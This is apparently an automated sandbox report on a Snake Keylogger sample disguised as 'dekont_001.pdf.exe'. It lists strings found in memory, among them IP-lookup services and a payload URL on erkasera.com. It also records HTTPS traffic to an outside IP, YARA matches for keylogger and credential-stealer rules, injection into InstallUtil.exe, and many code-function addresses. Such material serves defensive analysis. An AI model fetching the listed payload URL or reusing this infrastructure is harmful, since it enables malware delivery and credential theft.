00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002831000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com/ruurew/Ktanfonto.vdf
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: dekont_001.pdf.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_026EE640	0_2_026EE640
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_026EE631	0_2_026EE631
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_0711E490	0_2_0711E490
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_07100007	0_2_07100007
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Code function: 0_2_07100040	0_2_07100040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010A6120	1_2_010A6120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AF017	1_2_010AF017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AB338	1_2_010AB338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AC457	1_2_010AC457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010A6748	1_2_010A6748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AC761	1_2_010AC761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AB7E2	1_2_010AB7E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010A46D9	1_2_010A46D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010A9868	1_2_010A9868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010ACA41	1_2_010ACA41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010ABAC0	1_2_010ABAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010ABDA0	1_2_010ABDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AB502	1_2_010AB502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AE527	1_2_010AE527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AE538	1_2_010AE538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010A3570	1_2_010A3570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_010AC480	1_2_010AC480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A7B70	1_2_066A7B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A8460	1_2_066A8460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A3870	1_2_066A3870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0040	1_2_066A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A11C0	1_2_066A11C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AFA68	1_2_066AFA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AC648	1_2_066AC648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AFA59	1_2_066AFA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AC638	1_2_066AC638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AF600	1_2_066AF600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AF610	1_2_066AF610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ACEEA	1_2_066ACEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ACEF8	1_2_066ACEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ACAA0	1_2_066ACAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AD340	1_2_066AD340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AD350	1_2_066AD350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A73E8	1_2_066A73E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ADBF1	1_2_066ADBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A73D8	1_2_066A73D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AD7A8	1_2_066AD7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AD798	1_2_066AD798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A3860	1_2_066A3860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE049	1_2_066AE049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE058	1_2_066AE058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ADC00	1_2_066ADC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0006	1_2_066A0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A001E	1_2_066A001E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AB4E8	1_2_066AB4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE8F8	1_2_066AE8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A08F0	1_2_066A08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AB4D7	1_2_066AB4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A04A0	1_2_066A04A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE4A0	1_2_066AE4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE4B0	1_2_066AE4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0490	1_2_066A0490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0D60	1_2_066A0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AED60	1_2_066AED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AB940	1_2_066AB940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AED50	1_2_066AED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0D51	1_2_066A0D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AB930	1_2_066AB930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AE908	1_2_066AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A0900	1_2_066A0900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AC1E0	1_2_066AC1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AC1F0	1_2_066AC1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AF1A9	1_2_066AF1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066AF1B8	1_2_066AF1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A11B0	1_2_066A11B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ABD88	1_2_066ABD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066ABD98	1_2_066ABD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066A7D90	1_2_066A7D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DD670	1_2_066DD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DAA58	1_2_066DAA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D8608	1_2_066D8608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DB6E8	1_2_066DB6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DC388	1_2_066DC388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D8C51	1_2_066D8C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7050	1_2_066D7050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DD028	1_2_066DD028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DA408	1_2_066DA408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DB0A0	1_2_066DB0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DBD38	1_2_066DBD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DC9D8	1_2_066DC9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D11A0	1_2_066D11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5A60	1_2_066D5A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DD662	1_2_066DD662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5A70	1_2_066D5A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DAA53	1_2_066DAA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D560A	1_2_066D560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5618	1_2_066D5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5EC8	1_2_066D5EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DB6D9	1_2_066DB6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5EB8	1_2_066D5EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D6778	1_2_066D6778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DC378	1_2_066DC378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D6320	1_2_066D6320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D3730	1_2_066D3730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D6312	1_2_066D6312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DA3F8	1_2_066DA3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D6BC1	1_2_066D6BC1
